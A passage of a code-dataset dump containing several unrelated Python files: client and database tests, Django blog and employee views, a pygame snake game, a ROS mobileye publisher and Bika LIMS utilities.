monkeypatch, capsys, api_response, data_format, stdout_match, expected\n):\n client = fuzzbucket_client.__main__.Client()\n monkeypatch.setattr(fuzzbucket_client.__main__, \"default_client\", lambda: client)\n\n monkeypatch.setattr(\n client,\n \"_urlopen\",\n gen_fake_urlopen(io.StringIO(json.dumps(api_response))),\n )\n client.data_format = data_format\n\n assert client.list_aliases(\"known\", \"unknown\") == expected\n if stdout_match is not None:\n captured = capsys.readouterr()\n assert re.search(stdout_match, captured.out) is not None\n\n\n@pytest.mark.parametrize(\n (\"api_response\", \"data_format\", \"stdout_match\", \"expected\"),\n [\n pytest.param(\n {\"image_aliases\": {\"blep\": \"ami-babacacafafa\"}},\n fuzzbucket_client.__main__._DataFormats.INI,\n \"blep = ami-babacacafafa\",\n True,\n id=\"ok\",\n ),\n pytest.param(\n {\"image_aliases\": {\"blep\": \"ami-babacacafafa\"}},\n fuzzbucket_client.__main__._DataFormats.JSON,\n '\"blep\": \"ami-babacacafafa\"',\n True,\n id=\"ok\",\n ),\n pytest.param(\n {\"error\": \"oh no\"},\n fuzzbucket_client.__main__._DataFormats.INI,\n None,\n False,\n id=\"err\",\n ),\n ],\n)\ndef test_client_create_alias(\n monkeypatch, capsys, api_response, data_format, stdout_match, expected\n):\n client = fuzzbucket_client.__main__.Client()\n 
monkeypatch.setattr(fuzzbucket_client.__main__, \"default_client\", lambda: client)\n\n monkeypatch.setattr(\n client,\n \"_urlopen\",\n gen_fake_urlopen(io.StringIO(json.dumps(api_response))),\n )\n client.data_format = data_format\n\n assert (\n client.create_alias(\n argparse.Namespace(alias=\"blep\", ami=\"ami-babacacafafa\"), \"unknown\"\n )\n == expected\n )\n if stdout_match is not None:\n captured = capsys.readouterr()\n assert re.search(stdout_match, captured.out) is not None\n\n\ndef test_client_delete_alias(monkeypatch, caplog):\n client = fuzzbucket_client.__main__.Client()\n monkeypatch.setattr(fuzzbucket_client.__main__, \"default_client\", lambda: client)\n\n monkeypatch.setattr(client, \"_urlopen\", gen_fake_urlopen(io.StringIO(\"\")))\n\n assert client.delete_alias(argparse.Namespace(alias=\"hurr\"), \"unknown\")\n assert \"deleted alias\" in caplog.text\n\n\n@pytest.mark.parametrize(\n (\"data_format\", \"matches\"),\n [\n pytest.param(\n fuzzbucket_client.__main__._DataFormats.INI,\n [\"any = fields\", \"allowed = True\"],\n id=\"happy_ini\",\n ),\n pytest.param(\n fuzzbucket_client.__main__._DataFormats.JSON,\n ['\"any\": \"fields\"', '\"allowed\": true'],\n id=\"happy_json\",\n ),\n ],\n)\ndef test_client_get_key(monkeypatch, capsys, data_format, matches):\n client = fuzzbucket_client.__main__.Client()\n client.data_format = data_format\n monkeypatch.setattr(fuzzbucket_client.__main__, \"default_client\", lambda: client)\n\n monkeypatch.setattr(\n client,\n \"_urlopen\",\n gen_fake_urlopen(io.StringIO('{\"key\":{\"any\":\"fields\",\"allowed\":true}}')),\n )\n\n assert client.get_key(argparse.Namespace(alias=\"hurr\"), \"unknown\")\n\n captured = capsys.readouterr()\n for match in matches:\n assert match in captured.out\n\n\ndef test_client_delete_key(monkeypatch, caplog):\n client = fuzzbucket_client.__main__.Client()\n monkeypatch.setattr(fuzzbucket_client.__main__, \"default_client\", lambda: client)\n\n monkeypatch.setattr(\n client,\n \"_urlopen\",\n gen_fake_urlopen(io.StringIO('{\"key\":{\"braking\":\"litho\",\"retrograde\":true}}')),\n )\n\n assert client.delete_key(argparse.Namespace(alias=\"hurr\"), \"unknown\")\n assert \"deleted key\" in caplog.text\n\n\n@pytest.mark.parametrize(\n (\"user\", \"secret\", \"file_exists\", \"file_content\", \"write_matches\"),\n [\n pytest.param(\n \"daffy\",\n \"woohoo\",\n True,\n '[server \"http://weau\"]\\ncredentials = daffy:bugsdrools\\n',\n (\"^credentials = daffy:woohoo\", \"^credentials = daffy:bugsdrools\"),\n id=\"existing\",\n ),\n pytest.param(\n \"sam\",\n \"varmint\",\n True,\n \"\",\n (\"^credentials = sam:varmint\",),\n id=\"existing_empty\",\n ),\n pytest.param(\n \"foghorn\",\n \"wellahseenow\",\n False,\n \"\",\n (\"^credentials = foghorn:wellahseenow\",),\n id=\"new_config\",\n ),\n ],\n)\ndef test_client__write_credentials(\n monkeypatch, user, secret, file_exists, file_content, write_matches\n):\n state = {\"out\": io.StringIO()}\n\n class FakeFile:\n def exists(self):\n return file_exists\n\n @contextlib.contextmanager\n def open(self, mode: str = \"r\"):\n assert mode in (\"r\", \"w\")\n if mode == \"r\":\n yield io.StringIO(file_content)\n elif mode == \"w\":\n yield state[\"out\"]\n\n client = fuzzbucket_client.__main__.Client()\n monkeypatch.setattr(client, \"_credentials_file\", FakeFile())\n\n client._write_credentials(user, secret)\n assert client._cached_credentials is None\n state[\"out\"].seek(0)\n written = state[\"out\"].read()\n assert \"# WARNING:\" in written\n for write_match in 
write_matches:\n assert re.search(write_match, written, re.MULTILINE) is not None\n","sub_path":"tests/test_fuzzbucket_client.py","file_name":"test_fuzzbucket_client.py","file_ext":"py","file_size_in_byte":23814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"78488627","text":"from datetime import timedelta\nfrom typing import List\n\nfrom crud.measurement import LoggingDatabase\nfrom db.workbench_helper import WorkbenchHelper\nfrom models.measurement import Measurement\nfrom schemas.measurement import MeasurementCreate\n\n\ndef test_create_tables() -> None:\n db = LoggingDatabase()\n db.create_tables()\n\n assert True\n\n\ndef test_measurements_insert() -> None:\n db = LoggingDatabase()\n measurement = MeasurementCreate(\n i_device_id=1,\n i_channel_id=1,\n i_measurement_type=1,\n i_value=WorkbenchHelper.get_float_with_variation(\n mid_point=5, max_variation=0.5, decimal_places=1\n ),\n d_datetime=WorkbenchHelper.get_datetime_now_to_nearest_sec(),\n )\n db_measurement = db.insert_measurement(measurement)\n\n assert db_measurement.i_id is not None\n\n measurement = MeasurementCreate(\n i_measurement_type=2,\n i_device_id=1,\n i_channel_id=1,\n d_datetime=WorkbenchHelper.get_datetime_now_to_nearest_sec(),\n i_value=WorkbenchHelper.get_float_with_variation(\n mid_point=0.300, max_variation=0.050, decimal_places=3\n ),\n )\n\n db_measurement = db.insert_measurement(measurement)\n assert db_measurement.i_id is not None\n\n\ndef test_measurements_get_all_measurements() -> None:\n db = LoggingDatabase()\n measurements: List[Measurement] = db.get_all_measurements()\n\n assert len(measurements) > 0\n\n\ndef test_measurements_get_measurements_in_last_timedelta() -> None:\n db = LoggingDatabase()\n measurements: List[Measurement] = db.get_measurements_in_last_timedelta(\n period=timedelta(minutes=60)\n )\n\n assert len(measurements) > 0\n\n\ndef test_get_by_query() -> None:\n db = LoggingDatabase()\n result = db.get_by_query(\"public.measurements\")\n\n assert len(result) > 0\n","sub_path":"workbench_web/backend/app/app/tests/test_database.py","file_name":"test_database.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"570728364","text":"from django.urls import path \nfrom . 
import views \nfrom .views import (\n    PostListView,\n    PostDetailView,\n    PostCreateView,\n    PostUpdateView,\n    PostDeleteView,\n    CommentCreateView,\n    LikeView,\n    UserPostListView\n    )\n\nurlpatterns = [\n    path(\"about/\",views.about,name=\"about\"),\n    path(\"\",PostListView.as_view(),name=\"posts-home\"),\n    path(\"post//\",PostDetailView.as_view(),name=\"post-detail\"),\n    path(\"post/new/\",PostCreateView.as_view(),name=\"post-create\"),\n    path(\"post//update\",PostUpdateView.as_view(),name=\"post-update\"),\n    path(\"post//delete\",PostDeleteView.as_view(),name=\"post-delete\"),\n    path(\"post//comment\",CommentCreateView.as_view(),name=\"comment-create\"),\n    path(\"like/\",LikeView,name=\"like_post\"),\n    path(\"user/\",UserPostListView.as_view(),name=\"user_posts\")\n]\n\n\n","sub_path":"mysite/posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"25176606","text":"import random, pygame, sys\r\nimport time\r\nimport timeit\r\nimport itertools\r\nimport os\r\nfrom pygame.locals import *\r\nimport mainmenu,game\r\npygame.init()\r\n\r\n\r\ndef randomimg(imglist):\r\n    \"\"\"gets a list of images in .png and returns a random img.png\"\"\"\r\n    img = random.choice(imglist)\r\n    return img\r\n\r\n\r\ndef initgame():\r\n    # pre-render stuff\r\n    global ENDGAME, WIDTH, HEIGHT, ALLXY # ALLXY - all coordinates on the screen\r\n    global WHITE, GREEN, BLUE, BLACK, RED\r\n    global fontObj, textSurfaceDead, textRectDead\r\n    global BLUEBALLIMGLIST, REDBALLIMGLIST\r\n\r\n    cwd = os.getcwd()\r\n    REDBALLIMGLIST = []\r\n    BLUEBALLIMGLIST = []\r\n    for num in range(1, 6):\r\n        currentimg = cwd+'\\images\\\\redball' + str(num) + '.png'\r\n        REDBALLIMGLIST.append(currentimg)\r\n\r\n        currentimg = cwd+'\\images\\\\blueball' + str(num) + '.png'\r\n        BLUEBALLIMGLIST.append(currentimg)\r\n\r\n    WIDTH = 1360\r\n    HEIGHT = 760\r\n\r\n    ENDGAME = False\r\n\r\n    allx = [x for x in range(0, int((WIDTH + 20) / 20))]\r\n    ally = [y for y in range(0, int((HEIGHT + 20) / 20))]\r\n    ALLXY = []\r\n    ALLXY.append(allx)\r\n    ALLXY.append(ally)\r\n\r\n    ALLXY = list(itertools.product(*ALLXY))\r\n\r\n    WHITE = (255, 255, 255)\r\n    GREEN = (0, 255, 0)\r\n    BLUE = (0, 0, 255)\r\n    BLACK = (0, 0, 0)\r\n    RED = (255, 0, 0)\r\n\r\n    fontObj = pygame.font.Font('freesansbold.ttf', 32)\r\n\r\n    colors = [WHITE, GREEN, BLUE, BLACK, RED]\r\n\r\n\r\nclass Player(object):\r\n    def __init__(self, name=None, score=0):\r\n        self.name = name\r\n        self.score = score\r\n\r\n    def setname(name):\r\n        pass\r\n\r\n    def getname():\r\n        return self.name\r\n\r\n    def updatescore(score):\r\n        self.score += score\r\n\r\n    def getscore():\r\n        return self.score\r\n\r\n\r\nclass Board(object):\r\n    def __init__(self, allboard=[], snakespos={}):\r\n        self.allboard = allboard\r\n        self.snakespos = snakespos\r\n        self.fruitpos = []\r\n\r\n    def init(self):\r\n        allx = [x for x in range(0, int((WIDTH + 20) / 20))]\r\n        ally = [y for y in range(0, int((HEIGHT + 20) / 20))]\r\n        self.allboard.append(allx)\r\n        self.allboard.append(ally)\r\n\r\n        self.allboard = list(itertools.product(*self.allboard))\r\n\r\n    def update(self, fruit, s1=[], s2=[], s3=[], s4=[]):\r\n        del self.fruitpos[:]\r\n        if s1 == []:\r\n            pass\r\n        else:\r\n            self.snakespos['s1'] = s1.body\r\n        if s2 == []:\r\n            pass\r\n        else:\r\n            self.snakespos['s2'] = s2.body\r\n        if s3 == []:\r\n            pass\r\n        else:\r\n            self.snakespos['s3'] = s3.body\r\n        if s4 == []:\r\n            pass\r\n        else:\r\n            self.snakespos['s4'] = s4.body\r\n        self.fruitpos = []\r\n        
self.fruitpos.extend(fruit.pos)\r\n\r\n def getsnakespos(self):\r\n return self.snakespos\r\n\r\n def getfruitpos(self):\r\n\r\n return self.fruitpos\r\n\r\n\r\nclass Snake(object):\r\n drawobj = None\r\n\r\n def __init__(self, body=[], dirmem=[], stat='stop', color=None):\r\n self.body = []\r\n self.dirmem = [] # direction memory\r\n self.state = 'stop'\r\n self.color = color\r\n\r\n def init(self, xpos, ypos, bodylength, color): # needs to be from 10 up in jumps of 20 e.g: 10,30,...,310,330...\r\n for part in range(bodylength):\r\n self.body.append([xpos, ypos])\r\n xpos -= 20\r\n if xpos < 0:\r\n xpos = WIDTH - 10\r\n self.dirmem.append('right')\r\n self.color = color\r\n\r\n def move(self, direction):\r\n\r\n # opposite direction check\r\n if self.state == 'dead':\r\n return\r\n if (self.dirmem[0] == 'up' and direction == 'down') or (self.dirmem[0] == 'down' and direction == 'up') or (\r\n self.dirmem[0] == 'left' and direction == 'right') or (\r\n self.dirmem[0] == 'right' and direction == 'left'):\r\n direction = self.dirmem[0]\r\n self.dirmem.pop()\r\n self.dirmem.insert(0, direction)\r\n\r\n i = 0\r\n for ele in self.dirmem:\r\n if ele == 'up':\r\n self.body[i][1] -= 20\r\n if ele == 'down':\r\n self.body[i][1] += 20\r\n if ele == 'right':\r\n self.body[i][0] += 20\r\n if ele == 'left':\r\n self.body[i][0] -= 20\r\n # border check\r\n if self.body[i][1] > HEIGHT:\r\n self.body[i][1] = 10\r\n elif self.body[i][1] < 0:\r\n self.body[i][1] = HEIGHT - 10\r\n if self.body[i][0] > WIDTH:\r\n self.body[i][0] = 10\r\n elif self.body[i][0] < 0:\r\n self.body[i][0] = WIDTH - 10\r\n i += 1\r\n\r\n def grow(self):\r\n movex = 0\r\n movey = 0\r\n if self.dirmem[-1] == 'up':\r\n movey = 20\r\n elif self.dirmem[-1] == 'down':\r\n movey = -20\r\n elif self.dirmem[-1] == 'left':\r\n movex = 20\r\n elif self.dirmem[-1] == 'right':\r\n movex = -20\r\n self.dirmem.insert(len(self.dirmem), self.dirmem[-1])\r\n self.body.append([self.body[-1][0] + movex, self.body[-1][1] + movey])\r\n\r\n def draw(self):\r\n for part in self.body:\r\n # pygame.draw.circle(DISPLAYSURF,self.color,part,10,0)\r\n\r\n if self.color == BLUE:\r\n img = BLUEBALLIMGLIST\r\n if self.color == RED:\r\n img = REDBALLIMGLIST\r\n ballimg = pygame.image.load(randomimg(img))\r\n DISPLAYSURF.blit(ballimg, [part[0] - 10, part[1] - 10])\r\n\r\n def collide(self, board):\r\n if self.state != 'dead':\r\n head = self.body[0]\r\n # snake collided with itself\r\n for part in self.body[1:]:\r\n if head == part:\r\n print('collided with self')\r\n return 'dead'\r\n # snake collided with a fruit\r\n if head == board.fruitpos:\r\n self.state = 'eat'\r\n return self.state\r\n # snake collided with another snake\r\n for snake in board.snakespos.values():\r\n if snake != self.body:\r\n for part in snake:\r\n if head == part:\r\n print('collided with another snake')\r\n return 'dead'\r\n\r\n def dead(self):\r\n self.state = 'dead'\r\n text = 'p1 Ate Himself... 
His size at the time of death was ' + str(len(self.body))\r\n        textSurfaceDead = fontObj.render(text, True, WHITE, BLUE)\r\n        textRectDead = textSurfaceDead.get_rect()\r\n        textRectDead.center = (WIDTH / 2, HEIGHT / 2)\r\n        DISPLAYSURF.blit(textSurfaceDead, textRectDead)\r\n        del self.body[:]\r\n\r\n\r\nclass Fruit(object):\r\n    def __init__(self, pos=[]):\r\n        self.pos = pos\r\n\r\n    def init(self, board):\r\n\r\n        del self.pos[:]\r\n\r\n        allowed = []\r\n        allowed.extend(board.allboard)\r\n        for snake in board.snakespos.values():\r\n\r\n            for part in snake:\r\n                allowed.remove((int(part[0] / 20), int(part[1] / 20)))\r\n        temp = random.choice(allowed) # temp because we can't change a tuple\r\n        xpos = temp[0] * 20\r\n        ypos = temp[1] * 20\r\n\r\n        if xpos + 10 > WIDTH:\r\n            xpos -= 10\r\n        else:\r\n            xpos += 10\r\n        if ypos + 10 > HEIGHT:\r\n            ypos -= 10\r\n        else:\r\n            ypos += 10\r\n        pos = [xpos, ypos]\r\n        self.pos.extend(pos)\r\n\r\n        del allowed\r\n\r\n    def draw(self):\r\n        pygame.draw.circle(DISPLAYSURF, RED, self.pos, 10, 0)\r\n\r\n\r\ndef checkcollision(snake, fruit):\r\n    head = snake.body[0]\r\n    for part in snake.body[1:]:\r\n        if head == part:\r\n            return 'dead'\r\n    if head == fruit.pos:\r\n        return 'eat'\r\n\r\n    return False\r\n\r\n\r\nFPS = 10\r\nfpsClock = pygame.time.Clock()\r\n\r\ninitgame()\r\n\r\nDISPLAYSURF = pygame.display.set_mode((WIDTH, HEIGHT), FULLSCREEN) # for full screen add flag: FULLSCREEN\r\n\r\npygame.display.set_caption('Snake')\r\n\r\nboard = Board()\r\nboard.init()\r\ns1 = Snake()\r\ns2 = Snake()\r\nsnakes = [s1, s2]\r\ns1.init(310, 70, 8, BLUE)\r\ns2.init(50, 30, 8, RED)\r\nf1 = Fruit()\r\n\r\nboard.update(f1, s1, s2)\r\n\r\nf1.init(board)\r\n\r\np1direction = 'right'\r\np2direction = 'right'\r\nmainmenu.mainmenu()\r\nwhile True:\r\n    board.update(f1, s1, s2)\r\n    if ENDGAME == False:\r\n        DISPLAYSURF.fill(BLACK)\r\n        if s1.state != 'dead':\r\n            s1.move(p1direction)\r\n            s1.draw()\r\n        if s2.state != 'dead':\r\n            s2.move(p2direction)\r\n            s2.draw()\r\n        f1.draw()\r\n        if s1.collide(board) == 'dead' and s2.collide(board) == 'dead':\r\n            ENDGAME = True\r\n        if s1.collide(board) == 'dead' and ENDGAME == False:\r\n            print('boom')\r\n            s1.dead()\r\n            board.update(f1, s1, s2)\r\n            print(s1.body)\r\n        if s1.collide(board) == 'eat':\r\n            f1.init(board)\r\n            s1.draw()\r\n            f1.draw()\r\n            s1.grow()\r\n            FPS += 1\r\n        if s2.collide(board) == 'dead' and ENDGAME == False:\r\n            print('boom')\r\n            s2.dead()\r\n            board.update(f1, s1, s2)\r\n        if s2.collide(board) == 'eat':\r\n            f1.init(board)\r\n            s2.draw()\r\n            f1.draw()\r\n            s2.grow()\r\n            FPS += 1\r\n\r\n    for event in pygame.event.get():\r\n        if event.type == QUIT:\r\n            fontObj = 0\r\n            pygame.display.quit()\r\n            pygame.quit()\r\n            sys.exit()\r\n        if event.type == pygame.KEYDOWN:\r\n            # p1 keys\r\n            if event.key == K_UP:\r\n                p1direction = 'up'\r\n            if event.key == K_DOWN:\r\n                p1direction = 'down'\r\n            if event.key == K_RIGHT:\r\n                p1direction = 'right'\r\n            if event.key == K_LEFT:\r\n                p1direction = 'left'\r\n            # p2 keys\r\n            if event.key == K_w:\r\n                p2direction = 'up'\r\n            if event.key == K_s:\r\n                p2direction = 'down'\r\n            if event.key == K_d:\r\n                p2direction = 'right'\r\n            if event.key == K_a:\r\n                p2direction = 'left'\r\n\r\n            if event.key == K_q:\r\n                fontObj = 0\r\n                pygame.display.quit()\r\n                pygame.quit()\r\n                sys.exit()\r\n    pygame.display.update()\r\n    fpsClock.tick(FPS)","sub_path":"PycharmProjects/snakepygame/snakeworks.py","file_name":"snakeworks.py","file_ext":"py","file_size_in_byte":10306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} 
+{"seq_id":"119765281","text":"from django.shortcuts import render,redirect\nfrom .forms import SignUpForm,EmployeeForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator, PageNotAnInteger,EmptyPage\nfrom .models import Employee\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.views.generic import DetailView\nfrom django.views.generic.edit import CreateView,UpdateView,DeleteView\nfrom django.forms import widgets\nfrom django.urls import reverse_lazy\n\n# Create your views here.\ndef SignUp(request):\n    form = SignUpForm()\n    if request.method=='POST':\n        form = SignUpForm(request.POST)\n        if form.is_valid():\n            user = form.save(commit=False)\n            user.set_password(user.password)\n            user.save()\n            return redirect('login')\n        else:\n            print('Invalid data')\n            return render(request,'BowserApp/sign_up.html',locals())\n    return render(request,'BowserApp/sign_up.html',locals())\n\n@login_required\ndef home_page(request):\n    return render(request,'BowserApp/home_page.html')\n\n@login_required\ndef add_emp_view(request):\n    form = EmployeeForm()\n    if request.method=='POST':\n        form = EmployeeForm(data=request.POST,files=request.FILES)\n        if form.is_valid():\n            form.save()\n            return redirect('emp_list')\n    return render(request,'BowserApp/forms.html',locals())\n\n@login_required\ndef Emp_list_view(request):\n    emp_list = Employee.objects.all()\n    # paginator = Paginator(emp_list,10)\n    # page_number = request.GET('page')\n    # try:\n    #     emp_list = paginator.page(page_number)\n    # except PageNotAnInteger:\n    #     emp_list = paginator.page(1)\n    # except EmptyPage:\n    #     emp_list = paginator.page(paginator.num_pages)\n    return render(request,'BowserApp/emp_list.html',locals())\n\nclass EmployeeDetailView(LoginRequiredMixin, DetailView):\n    model = Employee\n    template_name = 'BowserApp/emp_detail.html'\n\n    def get_context_data(self,**kwargs):\n        context = super(EmployeeDetailView, self).get_context_data(**kwargs)\n        return context\n\nclass EmployeeDeleteView(LoginRequiredMixin, DeleteView):\n    model = Employee\n    success_url = reverse_lazy('emp_list')\n\nclass EmployeeUpdateView(LoginRequiredMixin, SuccessMessageMixin, UpdateView):\n    model = Employee\n    fields = '__all__'\n    success_message = \"Record Successfully Updated!\"\n\n    def get_form(self):\n        form = super(EmployeeUpdateView, self).get_form()\n        form.fields['emp_id'].widget = widgets.Textarea(attrs={'rows':1})\n        form.fields['emp_first_name'].widget = widgets.Textarea(attrs={'rows':1})\n        form.fields['emp_last_name'].widget = widgets.Textarea(attrs={'rows':1})\n        form.fields['emp_date_of_birth'].widget = widgets.DateInput(attrs={'type':'date'})\n        form.fields['emp_address1'].widget = widgets.Textarea(attrs={'rows':2})\n        form.fields['emp_address2'].widget = widgets.Textarea(attrs={'rows':2})\n        form.fields['emp_zip_code'].widget = widgets.Textarea(attrs={'rows':1})\n        form.fields['emp_city'].widget = widgets.Textarea(attrs={'rows':1})\n        form.fields['emp_mobile_no'].widget = widgets.Textarea(attrs={'rows':1})\n        return form\n","sub_path":"BowserProject/BowserApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"452202070","text":"#!/usr/bin/env python\n\n###############################################################################\n# Copyright 2017 The Apollo Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n###############################################################################\n\"\"\"\nFor GTA5\n\"\"\"\n#import os\n#import sys\n#import json\nimport time\nimport random\nimport rospy\n\nfrom modules.drivers.proto import mobileye_pb2\n\n\ndef mobileye_data(mobileye,count,q):\n # mobileye.header.timestamp_sec = 1\n # mobileye.header.module_name = 2\n # mobileye.header.sequence_num = 3\n # mobileye.header.lidar_timestamp = 4\n # mobileye.header.camera_timestamp = 5\n # mobileye.header.radar_timstamp = 6\n # mobileye.header.version = 7\n # mobileye.header.status = 8\n # if q.empty():\n # continue\n mobileye_list = q\n count = 0\n for data in mobileye_list:\n\n mobileye.header.timestamp_sec = time.time()\n mobileye.header.module_name = 'mobileye'\n mobileye.header.sequence_num = count #YYZmodfy 1122\n return mobileye\n # outman = mobileye.details_739.add()\n # outman.obstacle_id = data.obstacle_id\n # outman.obstacle_pos_x = data.obstacle_x\n # outman.obstacle_pos_y = data.obstacle_y\n # outman.obstacle_rel_vel_x = data.obstacle_rel_vel_x\n # outman.obstacle_type = data.obstacle_type\n # outman.obstacle_status = data.obstacle_status\n #\n # outman = mobileye.details_73a.add()\n # outman.obstacle_length = data.obstacle_length\n # outman.obstacle_width = data.obstacle_width\n '''\n outman = mobileye.details_73b.add()\n outman.object_accel_x = data.obstacle_acc\n outman.obstacle_angle = data.obstacle_angle\n '''\n # return mobileye\n\ndef main():\n rospy.init_node(\"mobileye_offline\", anonymous=True)\n mobileye_pub = rospy.Publisher(\n \"/apollo/sensor/mobileye\", mobileye_pb2.Mobileye, queue_size=1)\n # generate mobileye info\n mobileye = mobileye_pb2.Mobileye()\n\n # obstacles_list = []\n # obstacle_object = Obstacle(1,random.randint(10,20))\n # obstacles_list.append(obstacle_object)\n # q = obstacles_list\n #1,1,1,1,1,1,1,1,\n\n # send pose to /apollo/drivers/mobileye\n count = 0\n r = rospy.Rate(1)\n while not rospy.is_shutdown():\n mobileye_pub.publish(mobileye_data(mobileye,count,q))\n count += 1\n r.sleep()\n\n#class Obstacle:\n # def __init__(self,angle,acc):\n # self.obstacle_id = id_ob #range 0:63\n # self.obstacle_type = type_ob #range 0:7 0-Vehicle 1-Truck 2-Bike 3-Ped 4-Bicycle 5-Unused\n # self.obstacle_x = x\n # self.obstacle_y = y\n # self.obstacle_angle = angle #range -327.68:327.68 Unit:degree\n # #obstacle_speed = speed\n # self.obstacle_length = length #range 0:31 Unite:meter\n # self.obstacle_width = width #range 0:12.5 Unite:meter\n # self.obstacle_acc = acc\n # self.obstacle_rel_vel_x = rel_vel_x #Longitudinal relative velocity\n # self.obstacle_status = status #0-undefined 1-standing 2-stopped 3-moving 4-oncoming 5-parked 6-unused\n\n #id_ob,type_ob,x,y,length,width,,rel_vel_x,status\n\nif __name__ == '__main__':\n 
main()\n\n\n","sub_path":"gta_gps/bak/mobileye_tets.py","file_name":"mobileye_tets.py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"424259073","text":"from AccessControl import ModuleSecurityInfo, allow_module\nfrom DateTime import DateTime\nfrom Products.Archetypes.public import DisplayList\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.CMFPlone.TranslationServiceTool import TranslationServiceTool\nfrom Products.Five.browser import BrowserView\nfrom bika.lims import bikaMessageFactory as _\nfrom bika.lims import interfaces\nfrom bika.lims import logger\nfrom bika.lims.config import Publish\nfrom email.Utils import formataddr\nfrom plone.i18n.normalizer.interfaces import IIDNormalizer\nfrom reportlab.graphics.barcode import getCodes, getCodeNames, createBarcodeDrawing\nfrom zope.component import getUtility\nfrom zope.interface import providedBy\nimport copy,re,urllib\nimport plone.protect\nimport transaction\n\nModuleSecurityInfo('email.Utils').declarePublic('formataddr')\nallow_module('csv')\n\n# Wrapper for PortalTransport's sendmail - don't know why there sendmail\n# method is marked private\nModuleSecurityInfo('Products.bika.utils').declarePublic('sendmail')\n#Protected( Publish, 'sendmail')\ndef sendmail(portal, from_addr, to_addrs, msg):\n mailspool = portal.portal_mailspool\n mailspool.sendmail(from_addr, to_addrs, msg)\n\nModuleSecurityInfo('Products.bika.utils').declarePublic('printfile')\ndef printfile(portal, from_addr, to_addrs, msg):\n import os\n\n \"\"\" set the path, then the cmd 'lpr filepath'\n temp_path = 'C:/Zope2/Products/Bika/version.txt'\n\n os.system('lpr \"%s\"' %temp_path)\n \"\"\"\n pass\n\ndef getAnalysts(context):\n \"\"\" Present the LabManagers and Analysts as options for analyst\n \"\"\"\n mtool = getToolByName(context, 'portal_membership')\n pairs = []\n analysts = mtool.searchForMembers(roles = ['Manager', 'LabManager', 'Analyst'])\n for member in analysts:\n uid = member.getId()\n fullname = member.getProperty('fullname')\n if fullname is None:\n fullname = uid\n pairs.append((uid, fullname))\n pairs.sort(lambda x, y: cmp(x[1], y[1]))\n return DisplayList(pairs)\n\ndef isActive(obj):\n \"\"\" Check if obj is inactive or cancelled.\n \"\"\"\n wf = getToolByName(obj, 'portal_workflow')\n if (hasattr(obj, 'inactive_state') and obj.inactive_state == 'inactive') or \\\n wf.getInfoFor(obj, 'inactive_state', 'active') == 'inactive':\n return False\n if (hasattr(obj, 'cancellation_state') and obj.inactive_state == 'cancelled') or \\\n wf.getInfoFor(obj, 'cancellation_state', 'active') == 'cancelled':\n return False\n return True\n\ndef TimeOrDate(context, datetime, long_format = False):\n \"\"\" Return the Time date is today,\n otherwise return the Date.\n XXX timeordate needs long/short/time/date formats in bika_setup\n\"\"\"\n localLongTimeFormat = context.portal_properties.site_properties.localLongTimeFormat\n localTimeFormat = context.portal_properties.site_properties.localTimeFormat\n localTimeOnlyFormat = context.portal_properties.site_properties.localTimeOnlyFormat\n\n if hasattr(datetime, 'Date'):\n if (datetime.Date() > DateTime().Date()) or long_format:\n dt = datetime.asdatetime().strftime(localLongTimeFormat)\n elif (datetime.Date() < DateTime().Date()):\n dt = datetime.asdatetime().strftime(\"%d %b %Y\")\n elif datetime.Date() == DateTime().Date():\n dt = datetime.asdatetime().strftime(localTimeOnlyFormat)\n else:\n dt = 
datetime.asdatetime().strftime(localTimeFormat)\n dt = dt.replace(\"PM\", \"pm\").replace(\"AM\", \"am\")\n if len(dt) > 10:\n dt = dt.replace(\"12:00 am\", \"\")\n if dt == \"12:00 am\":\n dt = datetime.asdatetime().strftime(localTimeFormat)\n else:\n dt = datetime\n return dt\n\nclass ajaxGetObject(BrowserView):\n \"\"\" return redirect url if the item exists\n passes the request to portal_catalog\n requires '_authenticator' in request.\n \"\"\"\n def __call__(self):\n try:\n plone.protect.CheckAuthenticator(self.request)\n plone.protect.PostOnly(self.request)\n except:\n return \"\"\n pc = getToolByName(self.context, 'portal_catalog')\n id = self.request.get(\"id\", '').replace(\"*\", \"\")\n items = pc(self.request)\n if items:\n return items[0].getObject().absolute_url()\n\n# encode_header function copied from roundup's rfc2822 package.\nhqre = re.compile(r'^[A-z0-9!\"#$%%&\\'()*+,-./:;<=>?@\\[\\]^_`{|}~ ]+$')\n\nModuleSecurityInfo('Products.bika.utils').declarePublic('encode_header')\ndef encode_header(header, charset = 'utf-8'):\n \"\"\" Will encode in quoted-printable encoding only if header\n contains non latin characters\n \"\"\"\n\n # Return empty headers unchanged\n if not header:\n return header\n\n # return plain header if it does not contain non-ascii characters\n if hqre.match(header):\n return header\n\n quoted = ''\n #max_encoded = 76 - len(charset) - 7\n for c in header:\n # Space may be represented as _ instead of =20 for readability\n if c == ' ':\n quoted += '_'\n # These characters can be included verbatim\n elif hqre.match(c):\n quoted += c\n # Otherwise, replace with hex value like =E2\n else:\n quoted += \"=%02X\" % ord(c)\n plain = 0\n\n return '=?%s?q?%s?=' % (charset, quoted)\n\ndef zero_fill(matchobj):\n return matchobj.group().zfill(8)\n\nnum_sort_regex = 